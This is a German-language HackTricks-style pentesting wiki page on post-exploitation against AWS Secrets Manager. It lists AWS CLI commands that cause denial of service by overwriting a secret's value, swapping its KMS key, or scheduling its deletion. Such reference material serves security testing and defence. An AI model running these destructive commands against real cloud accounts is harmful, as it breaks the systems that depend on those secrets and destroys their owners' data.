AWS - Secrets Manager Post Exploitation

Unterstützen Sie HackTricks

Secrets Manager

Für weitere Informationen siehe:

AWS - Secrets Manager Enum

Geheime lesen

Die Geheimnisse selbst sind sensible Informationen, überprüfen Sie die Privilege Escalation-Seite, um zu erfahren, wie man sie liest.

DoS Ändern des Geheimniswerts

Durch Ändern des Werts des Geheimnisses könnten Sie alle Systeme, die von diesem Wert abhängen, DoS-en.

Beachten Sie, dass vorherige Werte ebenfalls gespeichert sind, daher ist es einfach, zum vorherigen Wert zurückzukehren.

# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"

DoS Ändern des KMS-Schlüssels

aws secretsmanager update-secret \
--secret-id MyTestSecret \
--kms-key-id arn:aws:kms:us-west-2:123456789012:key/EXAMPLE1-90ab-cdef-fedc-ba987EXAMPLE

DoS Löschen von Geheimnissen

Die minimale Anzahl von Tagen, um ein Geheimnis zu löschen, beträgt 7.

aws secretsmanager delete-secret \
--secret-id MyTestSecret \
--recovery-window-in-days 7
Unterstützen Sie HackTricks

Last updated